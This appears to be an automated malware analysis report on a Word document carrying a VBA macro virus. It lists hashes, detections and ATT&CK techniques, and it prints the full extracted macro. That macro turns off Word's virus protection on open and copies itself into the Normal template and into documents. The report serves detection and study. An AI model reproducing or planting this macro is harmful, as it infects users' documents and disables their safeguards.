Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9993a50d476a01da…

MALICIOUS

Office (OLE)

33.5 KB Created: 1997-09-17 08:18:00 Authoring application: Microsoft Word 9.0 First seen: 2012-10-03
MD5: 7d1b2de526fb0224fa52144fc25d2151 SHA-1: ee8f8ef40b3bd3eedf147f6ec42e5d14ff15d858 SHA-256: 9993a50d476a01da8240723ded007e74bf8ea798f9338debd0e743c26dd2d1b0
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro explicitly sets 'Options.VirusProtection = False', indicating an attempt to bypass security measures. The presence of the 'Heuristics.Macro.DisableVirusProtection-6136181-1' ClamAV detection further supports this malicious intent. The macro's logic suggests it aims to replace the current document's macros with those from the Normal template, potentially to execute further malicious code.

Heuristics 3

  • ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1168 bytes
SHA-256: c8124c3d2651203d39328b5cd1ed3f748af36070f5d459191ff59c7e7ec370d1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Please do NOT modify this file !
Private Sub Document_Open()
On Error Resume Next

Options.VirusProtection = False

Set Active = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set Normal = NormalTemplate.VBProject.VBComponents(1).CodeModule

Dim mark As String
mark = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, 1)
If mark = "'Please do NOT modify this file !" Then

 Active.DeleteLines 1, Active.CountOfLines
 Active.InsertLines 1, Normal.Lines(1, Normal.CountOfLines)
 
Else
NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Normal.CountOfLines
Normal.InsertLines 1, "'Please do NOT modify this file !"
Normal.InsertLines 2, Active.Lines(2, Active.CountOfLines)
NormalTemplate.Save
ActiveDocument.Save
ThisDocument.Save


' [MOT] (C) Dr.Copy 1999

End If




End Sub